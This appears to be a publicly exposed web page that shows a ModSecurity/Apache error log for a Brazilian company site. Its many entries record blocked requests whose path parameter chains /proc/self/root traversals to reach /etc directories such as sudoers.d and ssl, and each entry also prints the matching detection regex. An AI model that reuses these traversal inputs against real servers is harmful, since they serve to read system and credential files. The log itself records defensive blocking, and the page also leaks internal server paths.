https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:09.995223 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:39784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyqV_V7PWP6ixUYl6QCAAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:12.991509 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:33968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyrOyqAr6etmhZHNo4SAAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:24:13.531532 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:39800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyrfu8EFLIOrSqIptzngAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:14.805594 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:39802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyrgkwaGbbGflqUZCLEAAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:16.168289 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:39808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuysNa6ubjKNq_cu4YXnwAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:17.495701 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:39824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuysfu8EFLIOrSqIptznwAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:18.806669 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:39834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuysuoXxyEfFpUF8f_lBgAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:25.744417 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:57900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyuf-YZRR_7pZ7nDJihgAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:27.063003 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.243.128:57908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyuxkFeYa1D6dYQnDDRgAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:28.472502 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.243.128:57924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyvBkFeYa1D6dYQnDDSAAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:29.787590 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:45666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyvda6ubjKNq_cu4YXpAAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:31.123980 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.243.128:45672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyv_-YZRR_7pZ7nDJihwAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:35.723001 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.241.31:46752] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyw1_V7PWP6ixUYl6QNQAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:24:41.689707 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.241.31:34318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyyRkFeYa1D6dYQnDDYgAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:24:45.617906 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.228.61:57998] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuyzQbLMZ6AikZjR9Ux1wAAAAk"]
[Thu Mar 19 05:24:49.987655 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.241.31:34324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuy0f-YZRR_7pZ7nDJikwAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:24:59.988512 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.241.31:46148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuy2wkwaGbbGflqUZCLOAAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:25:41.939479 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.241.31:39658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzBQbLMZ6AikZjR9UyEgAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:25:45.005795 2026] [mime_magic:error] [pid 27403:tid 140411565680384] (70014)End of file found: [client 57.141.18.18:49606] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:25:45.563760 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:38440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzCeyqAr6etmhZHNo4cgAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:25:47.968436 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:38452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzC9a6ubjKNq_cu4YX0wAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:26:00.643556 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:45684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzGBkFeYa1D6dYQnDDswAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:12.772384 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:42458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzJOyqAr6etmhZHNo4hwAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:16.305578 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:36624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzKPu8EFLIOrSqIpt0AwAAAkA"], 